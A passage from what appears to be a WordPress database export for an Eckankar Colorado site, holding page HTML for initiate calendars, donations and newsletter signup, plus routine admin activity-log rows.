class=\"\" style=\"text-transform: capitalize; font-size: 106px; letter-spacing: 2px; margin-top: 52px; box-shadow: #cecece 0px 0px 0px 0px; padding-left: 0em; margin-left: auto; margin-right: auto; text-align: center; width: auto; font-family: \'Alegreya SC\'; font-weight: 400; line-height: 89px; text-shadow: #ffffff 0px 0px 56px; color: #ad7a05;\" data-font-family=\"Alegreya SC\" data-font-weight=\"400\" data-font-style=\"\">Initiate Pages</h1>\r\n</blockquote>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-testimonial-10 boldgrid-section dynamic-gridblock background-parallax\" style=\"color: #1d1d1d; background-position: 50% 50%; background-size: cover; background-color: #f5f2eb;\" data-bg-overlaycolor=\"rgba(255, 255, 255, 0.8)\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 0px;\">\r\n<div class=\"col-md-10 col-sm-8 col-xs-12 text-center col-lg-12\" style=\"padding: 2em; box-shadow: rgba(0, 0, 0, 0.1) 0px 4px 6px -1px, rgba(0, 0, 0, 0.06) 0px 2px 4px -1px;\">\r\n<p class=\"\" style=\"font-size: 24px; font-family: Raleway; font-weight: 400;\" data-font-family=\"Raleway\" data-font-weight=\"400\" data-font-style=\"\">These pages are for those who have enrolled in Eckankar’s Spiritual Living Courses.<br>\r\nAll are welcome to explore the benefits of the ECK courses and initiation&nbsp;<a href=\"https://www.eckankar.org/engage/advanced-spiritual-living/eck-initations/\" target=\"_blank\" rel=\"noopener\">here</a>.</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-14 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 64px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\" style=\"box-shadow: #cecece 0px 0px 0px 0px;\">\r\n<p class=\"\" style=\"text-align: center; font-size: 27px; text-transform: capitalize; font-family: Raleway; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px; padding-bottom: 1em; color: #ad7a05;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">INITIATE EVENT CALENDARS</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 54px; background-color: #ffffff;\">\r\n<div class=\"col-md-3 col-sm-4 col-xs-12 text-center col-lg-3\">\r\n<h4 class=\"\" style=\"text-transform: uppercase; font-family: \'Open Sans\'; font-weight: 500;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">Central Colorado</h4>\r\n<p class=\"\" style=\"margin-right: -15px; margin-left: -15px;\"><img class=\"bg-img alignnone wp-image-205232 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2019/12/eck-temple-member-cal-promo.jpg\" alt=\"Clear mountain stream with driftwood near the shore\" width=\"411\" height=\"231\"></p>\r\n<p class=\"wow headShake\" style=\"margin-top: -50px; text-align: center;\" data-wow-duration=\"1s\" data-wow-delay=\"1s\"><a class=\"color1-background-color color-3-text-contrast bg-background-color btn btn-rounded btn-regular\" href=\"https://eckankar-colorado.org/central-colorado-member-calendar-mec/\">Go Now!</a></p>\r\n</div>\r\n<div class=\"col-md-3 col-sm-4 col-xs-12 text-center col-lg-3\" data-bg-color-1=\"rgb(41, 100, 219)\" data-bg-color-2=\"rgb(255, 255, 255)\" data-bg-direction=\"to bottom\">\r\n<h4 class=\"\" style=\"text-transform: uppercase; font-family: \'Open Sans\'; font-weight: 500;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">colorado springs</h4>\r\n<p class=\"\" style=\"margin-right: -15px; margin-left: -15px;\"><img class=\"bg-img alignnone wp-image-252359 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/cosprings-member-cal-promo.jpg\" alt=\"\" width=\"411\" height=\"231\"></p>\r\n<p class=\"wow headShake\" style=\"margin-top: -50px; text-align: center;\" data-wow-duration=\"1s\" data-wow-delay=\"1s\"><a class=\"color1-background-color color-3-text-contrast bg-background-color btn btn-rounded btn-regular\" href=\"https://eckankar-colorado.org/colorado-springs-member-calendar-mec/\">Go Now!</a></p>\r\n</div>\r\n<div class=\"col-md-3 col-sm-4 col-xs-12 text-center col-lg-3\">\r\n<h4 class=\"\" style=\"text-transform: uppercase; font-family: \'Open Sans\'; font-weight: 500;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">loveland</h4>\r\n<p class=\"\" style=\"margin-right: -15px; margin-left: -15px;\"><img class=\"bg-img alignnone wp-image-205233 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/loveland-member-cal-promo.jpg\" alt=\"Green meadow overlooking mountains with clouds in the background\" width=\"411\" height=\"231\"></p>\r\n<p class=\"wow headShake\" style=\"margin-top: -50px; text-align: center;\" data-wow-duration=\"1s\" data-wow-delay=\"1s\"><a class=\"color1-background-color color-3-text-contrast bg-background-color btn btn-rounded btn-regular\" href=\"https://eckankar-colorado.org/loveland-member-calendar-mec/\">Go Now!</a></p>\r\n</div>\r\n<div class=\"col-md-3 col-sm-4 col-xs-12 text-center col-lg-3\">\r\n<h4 class=\"\" style=\"text-transform: uppercase; font-family: \'Open Sans\'; font-weight: 500; letter-spacing: 0px;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">Mountain Areas</h4>\r\n<p class=\"\" style=\"margin-right: -15px; margin-left: -15px;\"><img class=\"bg-img alignnone wp-image-205233 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/12/mountain-area-member-cal-promo.jpg\" alt=\"Fall foliage and a mountain stream\" width=\"411\" height=\"231\"></p>\r\n<p class=\"wow headShake\" style=\"margin-top: -50px; text-align: center;\" data-wow-duration=\"1s\" data-wow-delay=\"1s\"><a class=\"color1-background-color color-3-text-contrast bg-background-color btn btn-rounded btn-regular\" href=\"https://eckankar-colorado.org/mountain-area-member-calendar-mec/\">Go Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-testimonial-10 boldgrid-section dynamic-gridblock background-parallax\" style=\"color: #1d1d1d; background-position: 50% 50%; background-size: cover; background-color: #f5f2eb;\" data-bg-overlaycolor=\"rgba(255, 255, 255, 0.8)\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 0px;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-12 col-lg-1\"></div>\r\n<div class=\"col-md-10 col-sm-8 col-xs-12 text-center col-lg-10\" style=\"padding: 2em;\">\r\n<p class=\"h3\" style=\"font-weight: 600; margin-top: 20px; margin-bottom: 20px; font-family: Raleway; font-size: 24px; text-transform: none; font-style: italic; border-width: 0px; color: #3e3e3e;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"italic\"><i class=\"fa bg-inserted-icon fa-quote-left\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px inset; color: #d5b56b;\" aria-hidden=\"true\">&nbsp;&nbsp; </i>We are personally responsible for our own state of consciousness. As Soul unfolds toward total freedom, It understands total responsibility must be accepted for every thought and action.&nbsp;&nbsp;</p>\r\n<h4 class=\"color3-color bg-font-family-alt\" style=\"text-transform: capitalize;\">—Harold Klemp</h4>\r\n<p class=\"\"><em><a class=\"bg-font-family-alt\" href=\"http://www.eckbooks.org/items/The_Language_of_Soul-943-6.html\" target=\"_blank\" rel=\"noopener noreferrer\">The Language of Soul</a></em></p>\r\n</div>\r\n<div class=\"col-md-1 col-sm-2 col-xs-12 col-lg-1\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-testimonial-3 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-top: 24px; padding-bottom: 26px;\">\r\n<div class=\"col-md-3 col-sm-6 col-xs-12 text-center col-lg-3\">\r\n<p class=\"mod-reset\">&nbsp;</p>\r\n<p class=\"h3\" style=\"text-transform: capitalize; font-size: 25px; padding-bottom: 8px; font-family: Raleway; font-weight: 500; color: #ad7a05; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Colorado State<br>\r\nRESA Structure</p>\r\n<div class=\"row\" style=\"box-shadow: #cecece 0px 0px 0px 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div class=\"\" style=\"padding: 15px 10px; border-top: 10px solid #d5b56b; margin-bottom: 20px; box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px;\">\r\n<p class=\"\" style=\"font-size: 18px;\">How does the Colorado RESA structure work? Check the chart or FAQ to get a quick overview.<br>\r\n<br>\r\n<a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/wp-content/uploads/2023/07/RESA-Org-Chart-5.13.23.pdf\">Org Chart </a>/ <a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/resa-faq/\" target=\"_blank\" rel=\"noopener\">RESA FAQ</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-3 col-sm-6 col-xs-12 text-center col-lg-3\">\r\n<p class=\"mod-reset\">&nbsp;</p>\r\n<p class=\"h3\" style=\"text-transform: capitalize; font-size: 25px; padding-bottom: 8px; font-family: Raleway; font-weight: 500; color: #ad7a05;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Initiator and ECK<br>\r\nSpiritual Aides</p>\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div class=\"\" style=\"padding: 15px 10px; border-top: 10px solid #d5b56b; margin-bottom: 20px; box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px;\">\r\n<p class=\"\" style=\"font-size: 17px;\">Easily contact an ECK Initiator or request an ECK Spiritual Aide by filling out a simple form.<br>\r\n<br>\r\n<a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/resa-faq/eck-initiator-and-esa-scheduling-form/\">Go Here To Get In Touch</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-3 col-sm-6 col-xs-12 text-center col-lg-3\">\r\n<p class=\"mod-reset\">&nbsp;</p>\r\n<p class=\"h3\" style=\"text-transform: capitalize; font-size: 25px; padding-bottom: 8px; font-family: Raleway; font-weight: 500; color: #ad7a05;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">State Leader<br>\r\nContacts</p>\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div class=\"\" style=\"padding: 15px 10px; border-top: 10px solid #d5b56b; margin-bottom: 20px; box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px;\">\r\n<p class=\"\" style=\"font-size: 17px; margin: 0px;\">Got a question or feedback for Colorado ECK leaders? Contact local RESA structure leaders.<br>\r\n<br>\r\n<a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/resa-faq/colorado-statewide-leadership-contacts/\">Contact an ECK Leader</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-3 col-sm-6 col-xs-12 text-center col-lg-3\">\r\n<p class=\"mod-reset\">&nbsp;</p>\r\n<p class=\"h3\" style=\"text-transform: capitalize; font-size: 25px; padding-bottom: 8px; font-family: Raleway; font-weight: 500; color: #ad7a05;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Add/Update Email<br>\r\nor Mail Address</p>\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div class=\"\" style=\"padding: 15px 10px; border-top: 10px solid #d5b56b; margin-bottom: 20px; box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px;\">\r\n<p class=\"\" style=\"font-size: 17px; margin: 0px;\">Update your information to stay informed about all the ECK news in Colorado!<br>\r\n<br>\r\n<a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/update-email-mail/\">Add/Update Now</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"tmpl-services-2 boldgrid-section dynamic-gridblock background-fixed\" style=\"color: #e8e5e5; box-shadow: #cecece 0px 2px 4px -1px inset; background-image: linear-gradient(to left, rgba(255, 255, 255, 0.67), rgba(255, 255, 255, 0.67)), url(\'https://eckankar-colorado.org/wp-content/uploads/2023/10/sunset-gold-ocean-eagle-7.jpg\'); background-size: cover; background-position: 50% 50%;\" data-bg-overlaycolor-alpha=\"0.67\" data-bg-overlaycolor-class=\"1\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/10/sunset-gold-ocean-eagle-7.jpg\" data-bg-overlaycolor=\"rgba(255, 255, 255,0.67)\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; margin-top: 0px; padding-top: 0px;\">\r\n<div class=\"col-md-1 col-sm-12 col-xs-12 col-lg-1\"></div>\r\n<div class=\"col-md-5 col-sm-6 col-xs-10 align-column-center col-lg-5\" style=\"padding-right: 1em; box-shadow: #cecece 0px 2px 4px -1px inset; padding-left: 0em;\">\r\n<div style=\"border: 5px solid; margin-right: -50px; z-index: 1; position: relative; padding-top: 0px; padding-bottom: 0px; border-color: #d5b56b !important; box-shadow: rgba(0, 0, 0, 0.3) 0px 19px 38px, rgba(0, 0, 0, 0.22) 0px 15px 12px;\" class=\" bg-box bg-alpha-209\" data-alpha=\"0.96\" data-bg-uuid=\"bg-alpha-209\">\r\n<div class=\"row\" style=\"box-shadow: #cecece 0px 2px 4px -1px inset; margin-left: -11px; margin-right: -15px;\">\r\n<div class=\"col-md-6 col-sm-6 col-xs-12 color1-background-color color-1-text-contrast bg-background-color col-lg-6\" style=\"margin-left: -3px; padding: 1.5em;\">\r\n<div>\r\n<h2 class=\"color3-color\" style=\"font-size: 36px; text-align: center; font-family: \'Raleway\'; font-weight: 500;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Welcome</h2>\r\n<h4 class=\"\" style=\"font-size: 25px; text-align: center; font-family: \'Open Sans\'; font-weight: 500;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">ECk Initiates</h4>\r\n<h4 class=\"\" style=\"font-size: 23px;\"><br>\r\n<img class=\"aligncenter wp-image-68742 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/ek-sym-gold-sm.png\" alt=\"ECK Symbol\" width=\"71\" height=\"71\"></h4>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-sm-6 col-xs-12 align-column-center col-lg-6\">\r\n<div style=\"padding: 1em 1em 1em 1em;\" class=\"bg-box\">\r\n<p class=\"\" style=\"font-size: 24px; font-weight: 600; font-family: \'Raleway\'; color: rgba(62, 62, 62, 0.9);\" data-font-weight=\"600\" data-font-family=\"Raleway\" data-font-style=\"\">Divine love is not something you can talk about, but it is something that you can demonstrate as you live.</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-2 col-lg-1\" style=\"background-color: #f5f2eb;\"></div>\r\n<div class=\"col-md-5 col-sm-5 col-xs-12 col-lg-5\" style=\"padding: 0em; background-color: #f5f2eb;\">\r\n<div class=\"row\" style=\"margin-top: 50px; margin-bottom: 50px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-2 col-lg-1\">\r\n<div><i class=\"fa fa-heart\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px inset; color: #d5b56b;\" aria-hidden=\"true\"><span style=\"display: none;\">&nbsp;</span></i></div>\r\n</div>\r\n<div class=\"col-md-10 col-sm-9 col-xs-10 col-lg-10\">\r\n<div>\r\n<h3 class=\"\" style=\"margin-top: 0px; margin-bottom: 15px; font-family: \'Raleway\'; font-weight: 600; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Donations</h3>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\"><span class=\"\">Giving to Eckankar in Colorado is simple. Your donations will help us continue to reach the public and grow Eckankar within the state. All donations of any size are greatly appreciated. </span></p>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\"><span class=\"\">You Can Use PayPal or Credit Card.<br>\r\n<a href=\"https://www.paypal.com/donate?hosted_button_id=WAKYPRQYTCFXE\">Donate Online Now</a> (or by <a href=\"https://eckankar-colorado.org/wp-content/uploads/2019/12/Donation-authorization-form-12-2019-ch.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Mail-in)</a></span></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-12 col-lg-1\">\r\n<div></div>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"margin-top: 50px; margin-bottom: 50px;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-2 col-lg-1\">\r\n<div><i class=\"fa fa-newspaper-o\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px; color: #d5b56b;\" aria-hidden=\"true\"><span style=\"display: none;\">&nbsp;</span></i></div>\r\n</div>\r\n<div class=\"col-md-10 col-sm-9 col-xs-10 col-lg-10\">\r\n<div>\r\n<h3 class=\"\" style=\"margin-top: 0px; margin-bottom: 15px; font-family: \'Raleway\'; font-weight: 600; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">INITIATE Newsletter Signup</h3>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\">Sign up to receive your local Initiate Newsletter!<br>\r\nGet all the latest news and events from around the state. <br>\r\n<a class=\"\" href=\"https://eckankar-colorado.org/newsletter-subscription-members/\">Sign Up Today!</a></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-12 col-lg-1\"></div>\r\n</div>\r\n<div class=\"row\" style=\"margin-top: 50px; margin-bottom: 50px;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-2 col-lg-1\">\r\n<div><i class=\"fa fa-check-square-o\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px inset; color: #d5b56b;\" aria-hidden=\"true\"><span style=\"display: none;\">&nbsp;</span></i></div>\r\n</div>\r\n<div class=\"col-md-10 col-sm-9 col-xs-10 col-lg-10\">\r\n<div>\r\n<h3 class=\"\" style=\"margin-top: 0px; margin-bottom: 15px; font-family: \'Raleway\'; font-weight: 600; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Email Whitelisting</h3>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\">Whitelisting is the process of adding our email to an approved sender list, so emails from us will not be blocked or sent to spam.<br>\r\n<a class=\"\" href=\"https://eckankar-colorado.org/email-whitelisting/\">Learn How To Do It</a></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-12 col-lg-1\"></div>\r\n</div>\r\n<div class=\"row\" style=\"margin-top: 50px; margin-bottom: 50px;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-2 col-lg-1\">\r\n<div><i class=\"fa fa-star\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px; color: #d5b56b;\" aria-hidden=\"true\"><span style=\"display: none;\">&nbsp;</span></i></div>\r\n</div>\r\n<div class=\"col-md-10 col-sm-9 col-xs-10 col-lg-10\">\r\n<div>\r\n<h3 class=\"\" style=\"margin-top: 0px; margin-bottom: 15px; font-family: \'Raleway\'; font-weight: 600; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Got a Vahana Project Idea?</h3>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\">Do you want to help serve the Mahanta’s mission and have a great idea to share? We want to know about it!</p>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\">Let us know how we can work together.<br>\r\n<a href=\"https://eckankar-colorado.org/chela-ideas/\">Click here to share the details</a></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-12 col-lg-1\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(231306,39149,'_server_remote_addr','76.130.120.x'),(231302,39149,'_message_key','post_updated'),(231303,39149,'_user_id','2'),(231304,39149,'_user_login','S8zhaBda'),(231305,39149,'_user_email','nada@zipnadanot.org'),(231307,39149,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=68102&action=edit'),(231308,39150,'post_type','attachment'),(231309,39150,'attachment_id','160292'),(231310,39150,'attachment_title','girl-flower-pix-1'),(231311,39150,'attachment_filename','girl-flower-pix-1.jpg'),(231312,39150,'attachment_mime','image/jpeg'),(231313,39150,'_message_key','attachment_deleted'),(231314,39150,'_user_id','2'),(231315,39150,'_user_login','S8zhaBda'),(231316,39150,'_user_email','nada@zipnadanot.org'),(231317,39150,'_server_remote_addr','76.130.120.x'),(231318,39150,'_server_http_referer','https://eckankar-colorado.org/wp-admin/upload.php?post_type=attachment&media_folder=youth-and-family-1568073880&paged=1'),(231319,39151,'post_type','attachment'),(231320,39151,'attachment_id','160291'),(231321,39151,'attachment_title','two-kids-side-pix-1B'),(231322,39151,'attachment_filename','two-kids-side-pix-1B.jpg'),(231323,39151,'attachment_mime','image/jpeg'),(231324,39151,'_message_key','attachment_deleted'),(231325,39151,'_user_id','2'),(231326,39151,'_user_login','S8zhaBda'),(231327,39151,'_user_email','nada@zipnadanot.org'),(231328,39151,'_server_remote_addr','76.130.120.x'),(231329,39151,'_server_http_referer','https://eckankar-colorado.org/wp-admin/upload.php?post_type=attachment&media_folder=youth-and-family-1568073880&paged=1'),(231330,39152,'post_type','attachment'),(231331,39152,'attachment_id','151217'),(231332,39152,'attachment_title','two-kids-side-pix-2'),(231333,39152,'attachment_filename','two-kids-side-pix-2.jpg'),(231334,39152,'attachment_mime','image/jpeg'),(231335,39152,'_message_key','attachment_deleted'),(231336,39152,'_user_id','2'),(231337,39152,'_user_login','S8zhaBda'),(231338,39152,'_user_email','nada@zipnadanot.org'),(231339,39152,'_server_remote_addr','76.130.120.x'),(231340,39152,'_server_http_referer','https://eckankar-colorado.org/wp-admin/upload.php?post_type=attachment&media_folder=youth-and-family-1568073880&paged=1'),(231341,39153,'post_type','attachment'),(231342,39153,'attachment_id','151216'),(231343,39153,'attachment_title','two-kids-side-pix-1'),(231344,39153,'attachment_filename','two-kids-side-pix-1.jpg'),(231345,39153,'attachment_mime','image/jpeg'),(231346,39153,'_message_key','attachment_deleted'),(231347,39153,'_user_id','2'),(231348,39153,'_user_login','S8zhaBda'),(231349,39153,'_user_email','nada@zipnadanot.org'),(231350,39153,'_server_remote_addr','76.130.120.x'),(231351,39153,'_server_http_referer','https://eckankar-colorado.org/wp-admin/upload.php?post_type=attachment&media_folder=youth-and-family-1568073880&paged=1'),(231352,39154,'user_id','2'),(231353,39154,'user_email','nada@zipnadanot.org'),(231354,39154,'user_login','S8zhaBda'),(231355,39154,'_user_id','2'),(231356,39154,'_user_login','S8zhaBda'),(231357,39154,'_user_email','nada@zipnadanot.org'),(231358,39154,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'),(231359,39154,'_message_key','user_logged_in'),(231360,39154,'_server_remote_addr','76.130.120.x'),(231361,39154,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?interim-login=1&wp_lang=en_US'),(231362,39155,'post_id','7160'),(231363,39155,'post_type','page'),(231364,39155,'post_title','Home'),(231365,39155,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Open Sans\'; font-size: 30px; color: #1e63bc; font-weight: 500;\" data-font-style=\"\" data-font-family=\"Open Sans\" data-font-weight=\"500\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Are you looking for a deeper, more personal connection with God and Divine Spirit?<br>\r\nEckankar, the Path of Spiritual Freedom, can help you fulfill that dream.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">The events below can help you see beyond the surface of day-to-day life so you can <br>\r\nexperience the joy of Soul—your true self. Each awakens you to more of the love, wisdom, and creative powers already in your heart.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 30px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Raleway\'; font-weight: 500; font-size: 30px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul 